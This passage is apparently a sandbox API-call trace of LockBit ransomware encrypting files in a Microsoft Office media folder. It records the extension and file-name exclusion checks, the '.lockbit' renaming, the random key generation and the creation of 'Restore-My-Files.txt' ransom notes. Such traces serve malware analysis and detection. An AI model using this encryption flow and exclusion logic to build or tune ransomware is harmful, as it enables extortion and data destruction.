lpString2=".GIF") returned -1 [0204.876] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.876] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.876] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.876] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.876] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.876] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.877] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.877] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.877] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.877] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.877] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.877] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.877] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.877] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.878] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.878] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.878] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.878] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.878] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.878] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.878] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.878] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.878] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21535_.GIF") returned 1 [0204.878] lstrcmpiW (lpString1="ntldr", lpString2="BD21535_.GIF") returned 1 [0204.878] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21535_.GIF") returned 1 [0204.878] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21535_.GIF") returned 1 [0204.878] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21535_.GIF") returned -1 [0204.878] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21535_.GIF") returned 1 [0204.878] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21535_.GIF") returned 1 [0204.878] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.878] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21535_.GIF") returned=".GIF" [0204.897] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.897] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.897] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.897] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.897] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.897] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.897] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.898] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.898] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.898] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.898] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.898] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.898] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.898] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.898] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.898] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.898] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.898] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.898] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.898] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.898] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.898] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.898] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.898] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.898] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.898] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.898] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.898] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.898] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21535_.GIF.lockbit") returned 78 [0204.898] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21535_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21535_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.900] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.900] malloc (_Size=0x40068) returned 0x3df0008 [0204.900] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=299) returned 1 [0204.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.901] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.901] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.901] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.902] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21535_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21535_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.906] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.906] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.906] free (_Block=0x1fa2ed8) [0204.906] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21535_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.907] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.907] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.907] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3475600, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x51b201b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3475600, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x3ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BULLETS.DLL", cAlternateFileName="")) returned 1 [0204.907] lstrcmpiW (lpString1=".", lpString2="BULLETS.DLL") returned -1 [0204.907] lstrcmpiW (lpString1="..", lpString2="BULLETS.DLL") returned -1 [0204.907] PathFindExtensionW (pszPath="BULLETS.DLL") returned=".DLL" [0204.907] lstrcmpiW (lpString1=".386", lpString2=".DLL") returned -1 [0204.907] lstrcmpiW (lpString1=".cmd", lpString2=".DLL") returned -1 [0204.907] lstrcmpiW (lpString1=".exe", lpString2=".DLL") returned 1 [0204.907] lstrcmpiW (lpString1=".ani", lpString2=".DLL") returned -1 [0204.907] lstrcmpiW (lpString1=".adv", lpString2=".DLL") returned -1 [0204.907] lstrcmpiW (lpString1=".theme", lpString2=".DLL") returned 1 [0204.907] lstrcmpiW (lpString1=".msi", lpString2=".DLL") returned 1 [0204.907] lstrcmpiW (lpString1=".msp", lpString2=".DLL") returned 1 [0204.907] lstrcmpiW (lpString1=".com", lpString2=".DLL") returned -1 [0204.907] lstrcmpiW (lpString1=".diagpkg", lpString2=".DLL") returned -1 [0204.907] lstrcmpiW (lpString1=".nls", lpString2=".DLL") returned 1 [0204.907] lstrcmpiW (lpString1=".diagcab", lpString2=".DLL") returned -1 [0204.907] lstrcmpiW (lpString1=".lock", lpString2=".DLL") returned 1 [0204.907] lstrcmpiW (lpString1=".ocx", lpString2=".DLL") returned 1 [0204.907] lstrcmpiW (lpString1=".mpa", lpString2=".DLL") returned 1 [0204.907] lstrcmpiW (lpString1=".cpl", lpString2=".DLL") returned -1 [0204.907] lstrcmpiW (lpString1=".mod", lpString2=".DLL") returned 1 [0204.907] lstrcmpiW (lpString1=".hta", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".icns", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".prf", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".rtp", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".diagcfg", lpString2=".DLL") returned -1 [0204.908] lstrcmpiW (lpString1=".msstyles", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".bin", lpString2=".DLL") returned -1 [0204.908] lstrcmpiW (lpString1=".hlp", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".shs", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".drv", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".wpx", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".bat", lpString2=".DLL") returned -1 [0204.908] lstrcmpiW (lpString1=".rom", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".msc", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".spl", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".ps1", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".msu", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".ics", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".key", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".mp3", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".reg", lpString2=".DLL") returned 1 [0204.908] lstrcmpiW (lpString1=".dll", lpString2=".DLL") returned 0 [0204.908] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2f35a00, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbd3e24a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc2f35a00, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xb9, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115834.GIF", cAlternateFileName="")) returned 1 [0204.908] lstrcmpiW (lpString1=".", lpString2="J0115834.GIF") returned -1 [0204.908] lstrcmpiW (lpString1="..", lpString2="J0115834.GIF") returned -1 [0204.908] PathFindExtensionW (pszPath="J0115834.GIF") returned=".GIF" [0204.908] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.908] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.909] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.909] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.909] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.909] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.909] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.909] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.909] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.909] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.909] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.909] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.909] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.909] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.910] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.910] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.910] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115834.GIF") returned 1 [0204.910] lstrcmpiW (lpString1="ntldr", lpString2="J0115834.GIF") returned 1 [0204.910] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115834.GIF") returned 1 [0204.910] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115834.GIF") returned -1 [0204.910] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115834.GIF") returned -1 [0204.910] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115834.GIF") returned 1 [0204.910] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115834.GIF") returned -1 [0204.910] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.910] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115834.GIF") returned=".GIF" [0204.911] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.911] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.911] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.911] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.911] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.911] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.911] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.911] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.911] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.911] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.911] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.911] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.911] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.911] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.911] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.911] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.911] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.911] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.911] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.911] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.911] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.911] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.911] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.911] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.911] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.911] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.911] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.911] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.912] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115834.GIF.lockbit") returned 78 [0204.912] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115834.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115834.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.913] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.913] malloc (_Size=0x40068) returned 0x3df0008 [0204.913] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=185) returned 1 [0204.914] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.914] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.915] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.915] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.915] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.919] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115834.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115834.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.919] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.919] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.919] free (_Block=0x1fa2ed8) [0204.919] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115834.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.919] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.920] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.920] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4248700, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbd3e24a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc4248700, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xb1, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115835.GIF", cAlternateFileName="")) returned 1 [0204.920] lstrcmpiW (lpString1=".", lpString2="J0115835.GIF") returned -1 [0204.920] lstrcmpiW (lpString1="..", lpString2="J0115835.GIF") returned -1 [0204.920] PathFindExtensionW (pszPath="J0115835.GIF") returned=".GIF" [0204.920] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.920] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.920] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.920] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.920] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.920] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.920] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.920] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.920] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.920] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.920] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.920] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.920] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.920] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.920] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.920] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.920] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.921] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.921] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.921] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.921] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.921] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.921] lstrcmpiW (lpString1=".ini", 